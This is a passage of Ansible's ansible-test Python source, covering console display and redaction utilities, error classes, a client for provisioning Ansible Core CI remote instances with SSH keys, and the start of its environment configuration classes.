    return ''.join(random.choice(pool) for _ in range(length))
def generate_password() -> str:
    """Generate and return random password."""
    # Four repetitions of letters/digits/letters/digits/dash, with the trailing dash dropped.
    groups = [
        string.ascii_letters,
        string.digits,
        string.ascii_letters,
        string.digits,
        '-',
    ] * 4

    password = ''.join(random.choice(group) for group in groups[:-1])

    # Register the password so it is redacted from any console output.
    display.sensitive.add(password)

    return password
class Display:
    """Manages color console output."""

    # ANSI escape sequences for terminal colors.
    clear = '\033[0m'
    red = '\033[31m'
    green = '\033[32m'
    yellow = '\033[33m'
    blue = '\033[34m'
    purple = '\033[35m'
    cyan = '\033[36m'

    # Color used for info messages at each verbosity level; higher levels fall back to yellow.
    verbosity_colors = {
        0: None,
        1: green,
        2: blue,
        3: cyan,
    }

    def __init__(self) -> None:
        self.verbosity = 0
        self.color = sys.stdout.isatty()
        self.warnings: list[str] = []
        self.warnings_unique: set[str] = set()
        self.fd = sys.stderr  # default to stderr until config is initialized to avoid early messages going to stdout
        self.rows = 0
        self.columns = 0
        self.truncate = 0
        self.redact = True
        self.sensitive: set[str] = set()

        # Query the terminal size when stdin is a TTY.
        if os.isatty(0):
            self.rows, self.columns = unpack('HHHH', fcntl.ioctl(0, TIOCGWINSZ, pack('HHHH', 0, 0, 0, 0)))[:2]

    def __warning(self, message: str) -> None:
        """Internal implementation for displaying a warning message."""
        self.print_message('WARNING: %s' % message, color=self.purple)

    def review_warnings(self) -> None:
        """Review all warnings which previously occurred."""
        if not self.warnings:
            return

        self.__warning('Reviewing previous %d warning(s):' % len(self.warnings))

        for warning in self.warnings:
            self.__warning(warning)

    def warning(self, message: str, unique: bool = False, verbosity: int = 0) -> None:
        """Display a warning level message, optionally suppressing duplicates when unique=True."""
        if verbosity > self.verbosity:
            return

        if unique:
            if message in self.warnings_unique:
                return

            self.warnings_unique.add(message)

        self.__warning(message)
        self.warnings.append(message)

    def notice(self, message: str) -> None:
        """Display a notice level message."""
        self.print_message('NOTICE: %s' % message, color=self.purple)

    def error(self, message: str) -> None:
        """Display an error level message."""
        self.print_message('ERROR: %s' % message, color=self.red)

    def fatal(self, message: str) -> None:
        """Display a fatal level message."""
        self.print_message('FATAL: %s' % message, color=self.red, stderr=True)

    def info(self, message: str, verbosity: int = 0, truncate: bool = False) -> None:
        """Display an info level message when the configured verbosity is at least the given level."""
        if self.verbosity >= verbosity:
            color = self.verbosity_colors.get(verbosity, self.yellow)
            self.print_message(message, color=color, truncate=truncate)

    def print_message(  # pylint: disable=locally-disabled, invalid-name
        self,
        message: str,
        color: t.Optional[str] = None,
        stderr: bool = False,
        truncate: bool = False,
    ) -> None:
        """Display a message, applying redaction, truncation and color as configured."""
        if self.redact and self.sensitive:
            # Mask any registered sensitive values (such as passwords) before the message is written anywhere.
            for item in self.sensitive:
                if not item:
                    continue

                message = message.replace(item, '*' * len(item))

        if truncate:
            if len(message) > self.truncate > 5:
                message = message[:self.truncate - 5] + ' ...'

        if color and self.color:
            # convert color resets in message to desired color
            message = message.replace(self.clear, color)
            message = '%s%s%s' % (color, message, self.clear)

        fd = sys.stderr if stderr else self.fd

        print(message, file=fd)
        fd.flush()
class InternalError(Exception):
    """An unhandled internal error indicating a bug in the code."""

    def __init__(self, message: str) -> None:
        # Prefix makes it obvious the failure is a bug in ansible-test rather than user error.
        super().__init__('An internal error has occurred in ansible-test: %s' % message)
# Base class for expected, application-level failures (see SubprocessError, MissingEnvironmentVariable, HostConnectionError below).
class ApplicationError(Exception):
    """General application error."""
# NOTE(review): raised as control flow rather than emitted via the warnings module — confirm top-level handling.
class ApplicationWarning(Exception):
    """General application warning which interrupts normal program flow."""
# Subclasses SystemExit, so an uncaught timeout exits the process instead of printing a traceback.
class TimeoutExpiredError(SystemExit):
    """Error raised when the test timeout has been reached or exceeded."""
class SubprocessError(ApplicationError):
    """Error resulting from failed subprocess execution."""

    def __init__(
        self,
        cmd: list[str],
        status: int = 0,
        stdout: t.Optional[str] = None,
        stderr: t.Optional[str] = None,
        runtime: t.Optional[float] = None,
        error_callback: t.Optional[c.Callable[[SubprocessError], None]] = None,
    ) -> None:
        message = 'Command "%s" returned exit status %s.\n' % (shlex.join(cmd), status)
        message += format_command_output(stdout, stderr)

        self.cmd = cmd
        self.message = message
        self.status = status
        self.stdout = stdout
        self.stderr = stderr
        self.runtime = runtime

        # The callback receives this instance and may adjust self.message before the exception text is finalized below.
        if error_callback:
            error_callback(self)

        self.message = self.message.strip()

        super().__init__(self.message)
class MissingEnvironmentVariable(ApplicationError):
    """Error caused by missing environment variable."""

    def __init__(self, name: str) -> None:
        super().__init__(f'Missing environment variable: {name}')

        # Keep the variable name available for programmatic handling.
        self.name = name
class HostConnectionError(ApplicationError):
    """
    Raised when the initial connection during host profile setup has failed and all retries have been exhausted.
    Raised by provisioning code when one or more provisioning threads raise this exception.
    Also raised when an SSH connection fails for the shell command.
    """

    def __init__(self, message: str, callback: t.Optional[t.Callable[[], None]] = None) -> None:
        super().__init__(message)

        self._callback = callback  # optional cleanup/reporting hook, invoked via run_callback()

    def run_callback(self) -> None:
        """Run the error callback, if any."""
        if self._callback:
            self._callback()
def format_command_output(stdout: t.Optional[str], stderr: t.Optional[str]) -> str:
    """Return a formatted string containing the given stdout and stderr (if any).

    Accepts None for either stream, since callers such as SubprocessError default both to None;
    the original annotations claimed str and would crash on None input.
    """
    message = ''

    # Treat None (output not captured) the same as empty output.
    if stderr := (stderr or '').strip():
        message += '>>> Standard Error\n'
        message += f'{stderr}{Display.clear}\n'

    if stdout := (stdout or '').strip():
        message += '>>> Standard Output\n'
        message += f'{stdout}{Display.clear}\n'

    return message
def retry(func: t.Callable[..., TValue], ex_type: t.Type[BaseException] = SubprocessError, sleep: int = 10, attempts: int = 10, warn: bool = True) -> TValue:
    """Retry the specified function on failure.

    Makes up to `attempts - 1` guarded attempts with a delay after each failure,
    then one final attempt whose exception (if any) propagates to the caller.
    """
    remaining = attempts - 1

    while remaining:
        try:
            return func()
        except ex_type as ex:
            if warn:
                display.warning(str(ex))

            time.sleep(sleep)
            remaining -= 1

    return func()
def parse_to_list_of_dict(pattern: str, value: str) -> list[dict[str, str]]:
    """Parse lines from the given value using the specified pattern and return the extracted list of key/value pair dictionaries."""
    compiled = re.compile(pattern)
    matched = []
    unmatched: list[str] = []

    for line in value.splitlines():
        if match := compiled.search(line):
            matched.append(match.groupdict())
        else:
            unmatched.append(line)

    # Every line must match; otherwise report all of the lines which did not.
    if unmatched:
        raise Exception('Pattern "%s" did not match values:\n%s' % (pattern, '\n'.join(unmatched)))

    return matched
def get_subclasses(class_type: t.Type[C]) -> list[t.Type[C]]:
    """Returns a list of types that are concrete subclasses of the given type."""
    concrete: set[t.Type[C]] = set()
    pending: list[t.Type[C]] = [class_type]

    while pending:
        current = pending.pop()

        for subclass in current.__subclasses__():
            if subclass in concrete:
                continue

            # Abstract intermediate classes are traversed but excluded from the result.
            if not inspect.isabstract(subclass):
                concrete.add(subclass)

            pending.append(subclass)

    return sorted(concrete, key=lambda sc: sc.__name__)
def is_subdir(candidate_path: str, path: str) -> bool:
    """Returns true if candidate_path is path or a subdirectory of path."""
    sep = os.path.sep
    normalized_parent = path if path.endswith(sep) else path + sep
    normalized_candidate = candidate_path if candidate_path.endswith(sep) else candidate_path + sep

    return normalized_candidate.startswith(normalized_parent)
def paths_to_dirs(paths: list[str]) -> list[str]:
    """Returns a list of directories extracted from the given list of paths."""
    dir_names = set()

    for current in paths:
        parent = os.path.dirname(current)

        # walk up, recording each ancestor until the root (or an empty relative head) is reached
        while parent and parent != os.path.sep:
            dir_names.add(parent + os.path.sep)
            parent = os.path.dirname(parent)

    return sorted(dir_names)
def str_to_version(version: str) -> tuple[int, ...]:
    """Return a version tuple from a version string."""
    return tuple(map(int, version.split('.')))


def version_to_str(version: tuple[int, ...]) -> str:
    """Return a version string from a version tuple."""
    return '.'.join(map(str, version))


def sorted_versions(versions: list[str]) -> list[str]:
    """Return a sorted copy of the given list of versions."""
    parsed = sorted(str_to_version(item) for item in versions)
    return [version_to_str(item) for item in parsed]
def import_plugins(directory: str, root: t.Optional[str] = None) -> None:
    """
    Import plugins from the given directory relative to the given root.
    If the root is not provided, the 'lib' directory for the test runner will be used.
    """
    root = root if root is not None else os.path.dirname(__file__)

    path = os.path.join(root, directory)
    package = __name__.rsplit('.', 1)[0]
    prefix = '%s.%s.' % (package, directory.replace(os.path.sep, '.'))

    for _module_loader, name, _ispkg in pkgutil.iter_modules([path], prefix=prefix):
        # translate the dotted module name back into a file path under root
        relative = name[len(package) + 1:].replace('.', os.path.sep)
        load_module(os.path.join(root, relative + '.py'), name)
def load_plugins(base_type: t.Type[C], database: dict[str, t.Type[C]]) -> None:
    """
    Load plugins of the specified type and track them in the specified database.
    Only plugins which have already been imported will be loaded.
    """
    # key each concrete subclass by the final component of its module name
    plugins: dict[str, t.Type[C]] = {sc.__module__.rsplit('.', 1)[1]: sc for sc in get_subclasses(base_type)}

    database.update(plugins)
def load_module(path: str, name: str) -> None:
    """Load a Python module using the given name and path."""
    if name in sys.modules:
        return  # already loaded; keep the existing module object

    spec = importlib.util.spec_from_file_location(name, path)
    module = importlib.util.module_from_spec(spec)

    # register before executing so self-imports during exec_module resolve
    sys.modules[name] = module
    spec.loader.exec_module(module)
def sanitize_host_name(name: str) -> str:
    """Return a sanitized version of the given name, suitable for use as a hostname."""
    # collapse every run of disallowed characters to one dash, cap at 63 chars, trim edge dashes
    cleaned = re.sub('[^A-Za-z0-9]+', '-', name)
    return cleaned[:63].strip('-')
def get_generic_type(base_type: t.Type, generic_base_type: t.Type[TValue]) -> t.Optional[t.Type[TValue]]:
    """Return the generic type arg derived from the generic_base_type type that is associated with the base_type type, if any, otherwise return None."""
    # noinspection PyUnresolvedReferences
    candidate = t.get_args(base_type.__orig_bases__[0])[0]

    if isinstance(candidate, generic_base_type):
        return None

    return candidate
def get_type_associations(base_type: t.Type[TBase], generic_base_type: t.Type[TValue]) -> list[tuple[t.Type[TValue], t.Type[TBase]]]:
    """Create and return a list of tuples associating generic_base_type derived types with a corresponding base_type derived type."""
    associations = []

    for sc_type in get_subclasses(base_type):
        pair = (get_generic_type(sc_type, generic_base_type), sc_type)

        if pair[1]:
            associations.append(pair)

    return associations
def get_type_map(base_type: t.Type[TBase], generic_base_type: t.Type[TValue]) -> dict[t.Type[TValue], t.Type[TBase]]:
    """Create and return a mapping of generic_base_type derived types to base_type derived types."""
    # the associations are already (key, value) pairs, so dict() builds the mapping directly
    return dict(get_type_associations(base_type, generic_base_type))
def verify_sys_executable(path: str) -> t.Optional[str]:
    """Verify that the given path references the current Python interpreter. If not, return the expected path, otherwise return None."""
    # cheap checks first: exact match, then symlink-resolved match
    if path == sys.executable or os.path.realpath(path) == os.path.realpath(sys.executable):
        return None

    # fall back to asking the interpreter at `path` what it reports as sys.executable
    expected_executable = raw_command([path, '-c', 'import sys; print(sys.executable)'], capture=True)[0]

    if expected_executable == sys.executable:
        return None

    return expected_executable
def type_guard(sequence: c.Sequence[t.Any], guard_type: t.Type[C]) -> t.TypeGuard[c.Sequence[C]]:
    """
    Raises an exception if any item in the given sequence does not match the specified guard type.
    Use with assert so that type checkers are aware of the type guard.
    """
    offending = {type(item) for item in sequence if not isinstance(item, guard_type)}

    if offending:
        offending_names = sorted(str(item) for item in offending)
        raise Exception(f'Sequence required to contain only {guard_type} includes: {", ".join(offending_names)}')

    return True
# Shared module-level console display singleton used throughout ansible-test.
display = Display()  # pylint: disable=locally-disabled, invalid-name

# NOTE(review): runs at import time; presumably makes the bundled (vendored)
# dependencies importable — confirm against the _enable_vendoring definition.
_enable_vendoring()
| 38,868
|
Python
|
.py
| 897
| 36.254181
| 157
| 0.653997
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,098
|
core_ci.py
|
ansible_ansible/test/lib/ansible_test/_internal/core_ci.py
|
"""Access Ansible Core CI remote services."""
from __future__ import annotations
import abc
import dataclasses
import json
import os
import re
import stat
import traceback
import uuid
import time
import typing as t
from .http import (
HttpClient,
HttpResponse,
HttpError,
)
from .io import (
make_dirs,
read_text_file,
write_json_file,
write_text_file,
)
from .util import (
ApplicationError,
display,
mutex,
)
from .util_common import (
run_command,
ResultType,
)
from .config import (
EnvironmentConfig,
)
from .ci import (
get_ci_provider,
)
from .data import (
data_context,
PayloadConfig,
)
@dataclasses.dataclass(frozen=True)
class Resource(metaclass=abc.ABCMeta):
    """Abstract base for all Ansible Core CI resources."""

    @abc.abstractmethod
    def as_tuple(self) -> tuple[str, str, str, str]:
        """Return the resource as a tuple of platform, version, architecture and provider."""

    @abc.abstractmethod
    def get_label(self) -> str:
        """Return a user-friendly label for this resource."""

    @property
    @abc.abstractmethod
    def persist(self) -> bool:
        """True if the resource is persistent, otherwise false."""


@dataclasses.dataclass(frozen=True)
class VmResource(Resource):
    """Details needed to request a VM from Ansible Core CI."""

    platform: str
    version: str
    architecture: str
    provider: str
    tag: str

    def as_tuple(self) -> tuple[str, str, str, str]:
        """Return the resource as a tuple of platform, version, architecture and provider."""
        return (self.platform, self.version, self.architecture, self.provider)

    def get_label(self) -> str:
        """Return a user-friendly label for this resource."""
        return f'{self.platform} {self.version} ({self.architecture}) [{self.tag}] @{self.provider}'

    @property
    def persist(self) -> bool:
        """VM instances persist across runs, so this is always True."""
        return True


@dataclasses.dataclass(frozen=True)
class CloudResource(Resource):
    """Details needed to request cloud credentials from Ansible Core CI."""

    platform: str

    def as_tuple(self) -> tuple[str, str, str, str]:
        """Return the resource as a tuple of platform, version, architecture and provider."""
        # cloud credentials have no version or architecture; the platform doubles as the provider
        return (self.platform, '', '', self.platform)

    def get_label(self) -> str:
        """Return a user-friendly label for this resource."""
        return self.platform

    @property
    def persist(self) -> bool:
        """Cloud credentials are not persistent, so this is always False."""
        return False
class AnsibleCoreCI:
    """Client for Ansible Core CI services."""

    DEFAULT_ENDPOINT = 'https://ansible-core-ci.testing.ansible.com'

    def __init__(
        self,
        args: EnvironmentConfig,
        resource: Resource,
        load: bool = True,
    ) -> None:
        """Initialize the client, reusing a previously saved instance for persistent resources when load is True."""
        self.args = args
        self.resource = resource
        self.platform, self.version, self.arch, self.provider = self.resource.as_tuple()
        self.stage = args.remote_stage
        self.client = HttpClient(args)
        self.connection = None
        self.instance_id = None
        self.endpoint = None
        self.default_endpoint = args.remote_endpoint or self.DEFAULT_ENDPOINT
        self.retries = 3
        self.ci_provider = get_ci_provider()
        self.label = self.resource.get_label()

        stripped_label = re.sub('[^A-Za-z0-9_.]+', '-', self.label).strip('-')

        self.name = f"{stripped_label}-{self.stage}"  # turn the label into something suitable for use as a filename

        self.path = os.path.expanduser(f'~/.ansible/test/instances/{self.name}')
        self.ssh_key = SshKey(args)

        if self.resource.persist and load and self._load():
            # a saved instance exists on disk; verify it is still known to the service
            try:
                display.info(f'Checking existing {self.label} instance using: {self._uri}', verbosity=1)

                self.connection = self.get(always_raise_on=[404])

                display.info(f'Loaded existing {self.label} instance.', verbosity=1)
            except HttpError as ex:
                if ex.status != 404:
                    raise

                # the service no longer knows this instance; discard the stale saved state
                self._clear()

                display.info(f'Cleared stale {self.label} instance.', verbosity=1)

                self.instance_id = None
                self.endpoint = None
        elif not self.resource.persist:
            self.instance_id = None
            self.endpoint = None
            self._clear()

        if self.instance_id:
            self.started: bool = True
        else:
            # no usable saved instance; allocate a fresh ID for a future start() call
            self.started = False
            self.instance_id = str(uuid.uuid4())
            self.endpoint = None

            display.sensitive.add(self.instance_id)

        if not self.endpoint:
            self.endpoint = self.default_endpoint

    @property
    def available(self) -> bool:
        """Return True if Ansible Core CI is supported."""
        return self.ci_provider.supports_core_ci_auth()

    def start(self) -> t.Optional[dict[str, t.Any]]:
        """Start instance. Returns None when the instance was already started."""
        if self.started:
            display.info(f'Skipping started {self.label} instance.', verbosity=1)
            return None

        return self._start(self.ci_provider.prepare_core_ci_auth())

    def stop(self) -> None:
        """Stop instance."""
        if not self.started:
            display.info(f'Skipping invalid {self.label} instance.', verbosity=1)
            return

        response = self.client.delete(self._uri)

        if response.status_code == 404:
            # already gone on the server side; just drop the local state
            self._clear()
            display.info(f'Cleared invalid {self.label} instance.', verbosity=1)
            return

        if response.status_code == 200:
            self._clear()
            display.info(f'Stopped running {self.label} instance.', verbosity=1)
            return

        raise self._create_http_error(response)

    def get(self, tries: int = 3, sleep: int = 15, always_raise_on: t.Optional[list[int]] = None) -> t.Optional[InstanceConnection]:
        """Get instance connection information, polling up to `tries` times with `sleep` seconds between attempts."""
        if not self.started:
            display.info(f'Skipping invalid {self.label} instance.', verbosity=1)
            return None

        if not always_raise_on:
            always_raise_on = []

        # reuse a cached connection once the instance reported itself running
        if self.connection and self.connection.running:
            return self.connection

        while True:
            tries -= 1
            response = self.client.get(self._uri)

            if response.status_code == 200:
                break

            error = self._create_http_error(response)

            if not tries or response.status_code in always_raise_on:
                raise error

            display.warning(f'{error}. Trying again after {sleep} seconds.')
            time.sleep(sleep)

        if self.args.explain:
            # explain mode never contacted a real service; fabricate a plausible connection
            self.connection = InstanceConnection(
                running=True,
                hostname='cloud.example.com',
                port=12345,
                username='root',
                password='password' if self.platform == 'windows' else None,
            )
        else:
            response_json = response.json()
            status = response_json['status']
            con = response_json.get('connection')

            if con:
                self.connection = InstanceConnection(
                    running=status == 'running',
                    hostname=con['hostname'],
                    port=int(con['port']),
                    username=con['username'],
                    password=con.get('password'),
                    response_json=response_json,
                )
            else:
                # no connection details yet (instance still provisioning)
                self.connection = InstanceConnection(
                    running=status == 'running',
                    response_json=response_json,
                )

        if self.connection.password:
            display.sensitive.add(str(self.connection.password))

        status = 'running' if self.connection.running else 'starting'

        display.info(f'The {self.label} instance is {status}.', verbosity=1)

        return self.connection

    def wait(self, iterations: t.Optional[int] = 90) -> None:
        """Wait for the instance to become ready, polling every 10 seconds."""
        # NOTE(review): range(1, iterations) performs iterations - 1 checks, not iterations — confirm intended.
        for _iteration in range(1, iterations):
            if self.get().running:
                return
            time.sleep(10)

        raise ApplicationError(f'Timeout waiting for {self.label} instance.')

    @property
    def _uri(self) -> str:
        """The REST endpoint URI identifying this specific instance."""
        return f'{self.endpoint}/{self.stage}/{self.provider}/{self.instance_id}'

    def _start(self, auth) -> dict[str, t.Any]:
        """Start instance by submitting the provisioning request, then persist the local state."""
        display.info(f'Initializing new {self.label} instance using: {self._uri}', verbosity=1)

        data = dict(
            config=dict(
                platform=self.platform,
                version=self.version,
                architecture=self.arch,
                public_key=self.ssh_key.pub_contents,
            )
        )

        data.update(auth=auth)

        headers = {
            'Content-Type': 'application/json',
        }

        response = self._start_endpoint(data, headers)

        self.started = True
        self._save()

        display.info(f'Started {self.label} instance.', verbosity=1)

        if self.args.explain:
            return {}

        return response.json()

    def _start_endpoint(self, data: dict[str, t.Any], headers: dict[str, str]) -> HttpResponse:
        """Submit the PUT provisioning request, retrying transient failures. A 503 response is raised immediately without retrying."""
        tries = self.retries
        sleep = 15

        while True:
            tries -= 1
            response = self.client.put(self._uri, data=json.dumps(data), headers=headers)

            if response.status_code == 200:
                return response

            error = self._create_http_error(response)

            if response.status_code == 503:
                raise error

            if not tries:
                raise error

            display.warning(f'{error}. Trying again after {sleep} seconds.')
            time.sleep(sleep)

    def _clear(self) -> None:
        """Clear instance information, removing the saved state file if present."""
        try:
            self.connection = None
            os.remove(self.path)
        except FileNotFoundError:
            pass

    def _load(self) -> bool:
        """Load instance information from the saved state file. Returns False when missing or unreadable."""
        try:
            data = read_text_file(self.path)
        except FileNotFoundError:
            return False

        if not data.startswith('{'):
            return False  # legacy format

        config = json.loads(data)

        return self.load(config)

    def load(self, config: dict[str, str]) -> bool:
        """Load the instance from the provided dictionary."""
        self.instance_id = str(config['instance_id'])
        self.endpoint = config['endpoint']
        self.started = True

        display.sensitive.add(self.instance_id)

        return True

    def _save(self) -> None:
        """Save instance information to the state file, unless running in explain mode."""
        if self.args.explain:
            return

        config = self.save()

        write_json_file(self.path, config, create_directories=True)

    def save(self) -> dict[str, str]:
        """Save instance details and return as a dictionary."""
        return dict(
            label=self.resource.get_label(),
            instance_id=self.instance_id,
            endpoint=self.endpoint,
        )

    @staticmethod
    def _create_http_error(response: HttpResponse) -> ApplicationError:
        """Return an exception created from the given HTTP response."""
        response_json = response.json()
        stack_trace = ''

        if 'message' in response_json:
            message = response_json['message']
        elif 'errorMessage' in response_json:
            message = response_json['errorMessage'].strip()
            if 'stackTrace' in response_json:
                traceback_lines = response_json['stackTrace']

                # AWS Lambda on Python 2.7 returns a list of tuples
                # AWS Lambda on Python 3.7 returns a list of strings
                if traceback_lines and isinstance(traceback_lines[0], list):
                    traceback_lines = traceback.format_list(traceback_lines)

                trace = '\n'.join([x.rstrip() for x in traceback_lines])

                stack_trace = f'\nTraceback (from remote server):\n{trace}'
        else:
            # no recognized error fields; fall back to the raw payload
            message = str(response_json)

        return CoreHttpError(response.status_code, message, stack_trace)
class CoreHttpError(HttpError):
    """HTTP response as an error, preserving the remote message and stack trace separately."""

    def __init__(self, status: int, remote_message: str, remote_stack_trace: str) -> None:
        self.remote_message = remote_message
        self.remote_stack_trace = remote_stack_trace

        super().__init__(status, f'{remote_message}{remote_stack_trace}')
class SshKey:
    """Container for SSH key used to connect to remote instances."""

    KEY_TYPE = 'rsa'  # RSA is used to maintain compatibility with paramiko and EC2
    KEY_NAME = f'id_{KEY_TYPE}'
    PUB_NAME = f'{KEY_NAME}.pub'

    @mutex
    def __init__(self, args: EnvironmentConfig) -> None:
        """Locate (or generate) the key pair and register it for inclusion in delegation payloads."""
        key_pair = self.get_key_pair()

        if not key_pair:
            key_pair = self.generate_key_pair(args)

        key, pub = key_pair
        key_dst, pub_dst = self.get_in_tree_key_pair_paths()

        def ssh_key_callback(payload_config: PayloadConfig) -> None:
            """
            Add the SSH keys to the payload file list.
            They are either outside the source tree or in the cache dir which is ignored by default.
            """
            files = payload_config.files
            permissions = payload_config.permissions

            files.append((key, os.path.relpath(key_dst, data_context().content.root)))
            files.append((pub, os.path.relpath(pub_dst, data_context().content.root)))

            # the private key must be readable only by its owner for ssh to accept it
            permissions[os.path.relpath(key_dst, data_context().content.root)] = stat.S_IRUSR | stat.S_IWUSR

        data_context().register_payload_callback(ssh_key_callback)

        self.key, self.pub = key, pub

        if args.explain:
            # explain mode avoids reading files that may not exist
            self.pub_contents = None
            self.key_contents = None
        else:
            self.pub_contents = read_text_file(self.pub).strip()
            self.key_contents = read_text_file(self.key).strip()

    @staticmethod
    def get_relative_in_tree_private_key_path() -> str:
        """Return the ansible-test SSH private key path relative to the content tree."""
        temp_dir = ResultType.TMP.relative_path

        key = os.path.join(temp_dir, SshKey.KEY_NAME)

        return key

    def get_in_tree_key_pair_paths(self) -> t.Optional[tuple[str, str]]:
        """Return the ansible-test SSH key pair paths from the content tree."""
        temp_dir = ResultType.TMP.path

        key = os.path.join(temp_dir, self.KEY_NAME)
        pub = os.path.join(temp_dir, self.PUB_NAME)

        return key, pub

    def get_source_key_pair_paths(self) -> t.Optional[tuple[str, str]]:
        """Return the ansible-test SSH key pair paths for the current user."""
        base_dir = os.path.expanduser('~/.ansible/test/')

        key = os.path.join(base_dir, self.KEY_NAME)
        pub = os.path.join(base_dir, self.PUB_NAME)

        return key, pub

    def get_key_pair(self) -> t.Optional[tuple[str, str]]:
        """Return the ansible-test SSH key pair paths if present, otherwise return None."""
        # prefer a key pair already present in the content tree
        key, pub = self.get_in_tree_key_pair_paths()

        if os.path.isfile(key) and os.path.isfile(pub):
            return key, pub

        # fall back to the per-user key pair
        key, pub = self.get_source_key_pair_paths()

        if os.path.isfile(key) and os.path.isfile(pub):
            return key, pub

        return None

    def generate_key_pair(self, args: EnvironmentConfig) -> tuple[str, str]:
        """Generate an SSH key pair for use by all ansible-test invocations for the current user."""
        key, pub = self.get_source_key_pair_paths()

        if not args.explain:
            make_dirs(os.path.dirname(key))

        if not os.path.isfile(key) or not os.path.isfile(pub):
            run_command(args, ['ssh-keygen', '-m', 'PEM', '-q', '-t', self.KEY_TYPE, '-N', '', '-f', key], capture=True)

            if args.explain:
                return key, pub

            # newer ssh-keygen PEM output (such as on RHEL 8.1) is not recognized by paramiko
            key_contents = read_text_file(key)
            key_contents = re.sub(r'(BEGIN|END) PRIVATE KEY', r'\1 RSA PRIVATE KEY', key_contents)

            write_text_file(key, key_contents)

        return key, pub
class InstanceConnection:
    """Container for remote instance status and connection details."""

    def __init__(
        self,
        running: bool,
        hostname: t.Optional[str] = None,
        port: t.Optional[int] = None,
        username: t.Optional[str] = None,
        password: t.Optional[str] = None,
        response_json: t.Optional[dict[str, t.Any]] = None,
    ) -> None:
        self.running = running
        self.hostname = hostname
        self.port = port
        self.username = username
        self.password = password
        self.response_json = response_json or {}

    def __str__(self):
        # include the password in the credentials portion only when one is set
        credentials = f'{self.username}:{self.password}' if self.password else f'{self.username}'
        return f'{self.hostname}:{self.port} [{credentials}]'
| 17,309
|
Python
|
.py
| 414
| 32.091787
| 132
| 0.603617
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,099
|
config.py
|
ansible_ansible/test/lib/ansible_test/_internal/config.py
|
"""Configuration classes."""
from __future__ import annotations
import dataclasses
import enum
import os
import sys
import typing as t
from .util import (
verify_sys_executable,
version_to_str,
type_guard,
)
from .util_common import (
CommonConfig,
)
from .metadata import (
Metadata,
)
from .data import (
data_context,
PayloadConfig,
)
from .host_configs import (
ControllerConfig,
ControllerHostConfig,
HostConfig,
HostSettings,
OriginConfig,
PythonConfig,
VirtualPythonConfig,
)
# Type variable bound to HostConfig, used by the generic target helpers below.
THostConfig = t.TypeVar('THostConfig', bound=HostConfig)
class TerminateMode(enum.Enum):
    """When to terminate instances."""

    ALWAYS = enum.auto()
    NEVER = enum.auto()
    SUCCESS = enum.auto()

    def __str__(self) -> str:
        """Render the mode as its lowercase member name (for CLI display)."""
        return self.name.lower()
@dataclasses.dataclass(frozen=True)
class ModulesConfig:
    """Configuration for modules."""

    python_requires: str
    python_versions: tuple[str, ...]
    controller_only: bool


@dataclasses.dataclass(frozen=True)
class ContentConfig:
    """Configuration for all content."""

    modules: ModulesConfig
    python_versions: tuple[str, ...]
class EnvironmentConfig(CommonConfig):
    """Configuration common to all commands which execute in an environment."""

    def __init__(self, args: t.Any, command: str) -> None:
        super().__init__(args, command)

        self.host_settings: HostSettings = args.host_settings
        self.host_path: t.Optional[str] = args.host_path
        self.containers: t.Optional[str] = args.containers
        self.pypi_proxy: bool = args.pypi_proxy
        self.pypi_endpoint: t.Optional[str] = args.pypi_endpoint

        # Populated by content_config.get_content_config on the origin.
        # Serialized and passed to delegated instances to avoid parsing a second time.
        self.content_config: t.Optional[ContentConfig] = None

        # Set by check_controller_python once HostState has been created by prepare_profiles.
        # This is here for convenience, to avoid needing to pass HostState to some functions which already have access to EnvironmentConfig.
        self.controller_python: t.Optional[PythonConfig] = None
        """
        The Python interpreter used by the controller.
        Only available after delegation has been performed or skipped (if delegation is not required).
        """

        if self.host_path:
            # state was restored from an existing host path; no further delegation is needed
            self.delegate = False
        else:
            # delegate when the controller is not the origin, uses a virtualenv, or runs a
            # different Python version/executable than the current interpreter
            self.delegate = (
                not isinstance(self.controller, OriginConfig)
                or isinstance(self.controller.python, VirtualPythonConfig)
                or self.controller.python.version != version_to_str(sys.version_info[:2])
                or bool(verify_sys_executable(self.controller.python.path))
            )

        self.docker_network: t.Optional[str] = args.docker_network
        self.docker_terminate: t.Optional[TerminateMode] = args.docker_terminate

        self.remote_endpoint: t.Optional[str] = args.remote_endpoint
        self.remote_stage: t.Optional[str] = args.remote_stage
        self.remote_terminate: t.Optional[TerminateMode] = args.remote_terminate

        self.prime_containers: bool = args.prime_containers

        self.requirements: bool = args.requirements

        self.delegate_args: list[str] = []

        self.dev_systemd_debug: bool = args.dev_systemd_debug
        self.dev_probe_cgroups: t.Optional[str] = args.dev_probe_cgroups

        def host_callback(payload_config: PayloadConfig) -> None:
            """Add the host files to the payload file list."""
            config = self

            if config.host_path:
                settings_path = os.path.join(config.host_path, 'settings.dat')
                state_path = os.path.join(config.host_path, 'state.dat')
                config_path = os.path.join(config.host_path, 'config.dat')

                files = payload_config.files

                files.append((os.path.abspath(settings_path), settings_path))
                files.append((os.path.abspath(state_path), state_path))
                files.append((os.path.abspath(config_path), config_path))

        data_context().register_payload_callback(host_callback)

    @property
    def controller(self) -> ControllerHostConfig:
        """Host configuration for the controller."""
        return self.host_settings.controller

    @property
    def targets(self) -> list[HostConfig]:
        """Host configuration for the targets."""
        return self.host_settings.targets

    def only_target(self, target_type: t.Type[THostConfig]) -> THostConfig:
        """
        Return the host configuration for the target.
        Requires that there is exactly one target of the specified type.
        """
        targets = list(self.targets)

        if len(targets) != 1:
            raise Exception('There must be exactly one target.')

        target = targets.pop()

        if not isinstance(target, target_type):
            # NOTE(review): message formats type(target_type); type(target) was probably intended — confirm.
            raise Exception(f'Target is {type(target_type)} instead of {target_type}.')

        return target

    def only_targets(self, target_type: t.Type[THostConfig]) -> list[THostConfig]:
        """
        Return a list of target host configurations.
        Requires that there are one or more targets, all the specified type.
        """
        if not self.targets:
            raise Exception('There must be one or more targets.')

        # the assert narrows the type for static checkers and validates at runtime
        assert type_guard(self.targets, target_type)

        return t.cast(list[THostConfig], self.targets)

    @property
    def target_type(self) -> t.Type[HostConfig]:
        """
        The true type of the target(s).
        If the target is the controller, the controller type is returned.
        Requires at least one target, and all targets must be of the same type.
        """
        target_types = set(type(target) for target in self.targets)

        if len(target_types) != 1:
            raise Exception('There must be one or more targets, all of the same type.')

        target_type = target_types.pop()

        if issubclass(target_type, ControllerConfig):
